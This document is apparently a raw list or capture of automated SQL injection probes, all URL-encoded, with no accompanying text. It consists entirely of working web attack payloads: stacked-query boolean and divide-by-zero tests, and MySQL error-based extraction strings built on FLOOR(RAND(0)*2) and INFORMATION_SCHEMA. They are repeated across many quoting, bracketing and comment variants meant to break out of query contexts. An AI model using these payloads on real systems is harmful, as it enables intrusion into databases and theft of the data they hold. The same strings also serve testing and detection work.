-7931%27%29%3B%20SELECT%20%28CASE%20WHEN%20%283978%3D7944%29%20THEN%203978%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8240%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5314%27%29%3B%20SELECT%20%28CASE%20WHEN%20%283358%3D8218%29%20THEN%203358%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1854%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284727%3D2574%29%20THEN%204727%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9642%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2785%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287946%3D5349%29%20THEN%207946%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5721%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283564%3D6212%29%20THEN%203564%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2204%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1028%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285033%3D2170%29%20THEN%205033%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3206%27%3B%20SELECT%20%28CASE%20WHEN%20%284501%3D4491%29%20THEN%204501%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6719%27%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3043%27%3B%20SELECT%20%28CASE%20WHEN%20%283584%3D7099%29%20THEN%203584%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8431%27%29%3B%20SELECT%20%28CASE%20WHEN%20%285886%3D6318%29%20THEN%205886%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2512%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4219%27%29%3B%20SELECT%20%28CASE%20WHEN%20%289955%3D1692%29%20THEN%209955%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9442%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283844%3D7882%29%20THEN%203844%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1225%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6075%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281092%3D6742%29%20THEN%201092%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2985%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282165%3D1052%29%20THEN%202165%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2011%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4605%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283321%3D1543%29%20THEN%203321%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3817%27%3B%20SELECT%20%28CASE%20WHEN%20%287887%3D1723%29%20THEN%207887%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6811%27%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9910%27%3B%20SELECT%20%28CASE%20WHEN%20%286125%3D3497%29%20THEN%206125%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5133%22%29%3B%20SELECT%20%28CASE%20WHEN%20%282264%3D7139%29%20THEN%202264%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9895%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1093%22%29%3B%20SELECT%20%28CASE%20WHEN%20%283115%3D3338%29%20THEN%203115%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5507%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289096%3D3068%29%20THEN%209096%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8884%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3878%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282924%3D4021%29%20THEN%202924%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6691%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289390%3D5478%29%20THEN%209390%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5984%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7790%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286887%3D5536%29%20THEN%206887%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5053%22%3B%20SELECT%20%28CASE%20WHEN%20%285372%3D3271%29%20THEN%205372%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3810%22%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8457%22%3B%20SELECT%20%28CASE%20WHEN%20%283437%3D6754%29%20THEN%203437%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2444%22%29%3B%20SELECT%20%28CASE%20WHEN%20%282893%3D5930%29%20THEN%202893%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3859%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9881%22%29%3B%20SELECT%20%28CASE%20WHEN%20%288610%3D8611%29%20THEN%208610%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5261%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289879%3D1999%29%20THEN%209879%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3764%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2436%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286242%3D5369%29%20THEN%206242%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8711%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285222%3D9390%29%20THEN%205222%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4068%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3794%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289687%3D9724%29%20THEN%209687%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2433%22%3B%20SELECT%20%28CASE%20WHEN%20%285364%3D5619%29%20THEN%205364%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9287%22%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3463%22%3B%20SELECT%20%28CASE%20WHEN%20%282423%3D3051%29%20THEN%202423%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5793%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%281625%3D6474%29%20THEN%201625%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4720%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1998%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%283502%3D9420%29%20THEN%203502%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5479%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282093%3D2968%29%20THEN%202093%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7438%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2377%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281210%3D5434%29%20THEN%201210%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6805%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284650%3D2846%29%20THEN%204650%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1004%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7187%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283455%3D3523%29%20THEN%203455%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9975%25%27%3B%20SELECT%20%28CASE%20WHEN%20%285756%3D1751%29%20THEN%205756%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8823%25%27%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4640%25%27%3B%20SELECT%20%28CASE%20WHEN%20%287462%3D9793%29%20THEN%207462%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4337%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%289220%3D6273%29%20THEN%209220%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5342%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7956%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287435%3D5409%29%20THEN%207435%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8852%00%27%3B%20SELECT%20%28CASE%20WHEN%20%286057%3D8776%29%20THEN%206057%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5532%00%27%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4443%00%27%3B%20SELECT%20%28CASE%20WHEN%20%289385%3D9466%29%20THEN%209385%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5282%27%29%20WHERE%209216%3D9216%3B%20SELECT%20%28CASE%20WHEN%20%284001%3D8141%29%20THEN%204001%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8656%27%29%20WHERE%203538%3D3538%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9415%27%29%20WHERE%203871%3D3871%3B%20SELECT%20%28CASE%20WHEN%20%286385%3D3857%29%20THEN%206385%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9364%22%29%20WHERE%201077%3D1077%3B%20SELECT%20%28CASE%20WHEN%20%281495%3D7170%29%20THEN%201495%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3718%22%29%20WHERE%207570%3D7570%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3905%22%29%20WHERE%208971%3D8971%3B%20SELECT%20%28CASE%20WHEN%20%285096%3D7732%29%20THEN%205096%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8263%29%20WHERE%209974%3D9974%3B%20SELECT%20%28CASE%20WHEN%20%288277%3D7130%29%20THEN%208277%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2696%29%20WHERE%202885%3D2885%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7240%29%20WHERE%208594%3D8594%3B%20SELECT%20%28CASE%20WHEN%20%281339%3D8452%29%20THEN%201339%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5222%27%20WHERE%208013%3D8013%3B%20SELECT%20%28CASE%20WHEN%20%285793%3D6816%29%20THEN%205793%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2258%27%20WHERE%207978%3D7978%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7017%27%20WHERE%207728%3D7728%3B%20SELECT%20%28CASE%20WHEN%20%289392%3D8112%29%20THEN%209392%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3096%22%20WHERE%202571%3D2571%3B%20SELECT%20%28CASE%20WHEN%20%284390%3D2607%29%20THEN%204390%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8690%22%20WHERE%209643%3D9643%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3466%22%20WHERE%202714%3D2714%3B%20SELECT%20%28CASE%20WHEN%20%284742%3D7010%29%20THEN%204742%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5784%20WHERE%206170%3D6170%3B%20SELECT%20%28CASE%20WHEN%20%281643%3D2387%29%20THEN%201643%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2084%20WHERE%206866%3D6866%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1831%20WHERE%202393%3D2393%3B%20SELECT%20%28CASE%20WHEN%20%286530%3D6317%29%20THEN%206530%20ELSE%201%2F%28SELECT%200%29%20END%29-- 1234.5%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%22%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%282868%3D2868 1234.5%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%288413%3D8413 1234.5%29%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%288600%3D8600 1234.5%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27iFBY%27%3D%27iFBY 1234.5%27%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27otbJ%27%3D%27otbJ 1234.5%27%29%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27QZer%27%3D%27QZer 1234.5%27%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27ZQFu%27%3D%27ZQFu 1234.5%27%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27jqgU%27%20LIKE%20%27jqgU 1234.5%27%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27SIwJ%27%20LIKE%20%27SIwJ 1234.5%27%29%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27Lfiv%27%20LIKE%20%27Lfiv 1234.5%27%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27rood%27%20LIKE%20%27rood 1234.5%22%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22lbbq%22%3D%22lbbq 1234.5%22%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22xLlu%22%3D%22xLlu 1234.5%22%29%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22loFO%22%3D%22loFO 1234.5%22%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22rKjK%22%3D%22rKjK 1234.5%22%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22zarP%22%20LIKE%20%22zarP 1234.5%22%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22TqVF%22%20LIKE%20%22TqVF 1234.5%22%29%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22vtFW%22%20LIKE%20%22vtFW 1234.5%22%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22anLv%22%20LIKE%20%22anLv 1234.5%25%27%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27cCJc%27%3D%27cCJc 1234.5%00%27%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27BfZG%27%3D%27BfZG 1234.5%27%29%20WHERE%207135%3D7135%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1234.5%22%29%20WHERE%202715%3D2715%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1234.5%29%20WHERE%208532%3D8532%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1234.5%27%20WHERE%205740%3D5740%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1234.5%22%20WHERE%209490%3D9490%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 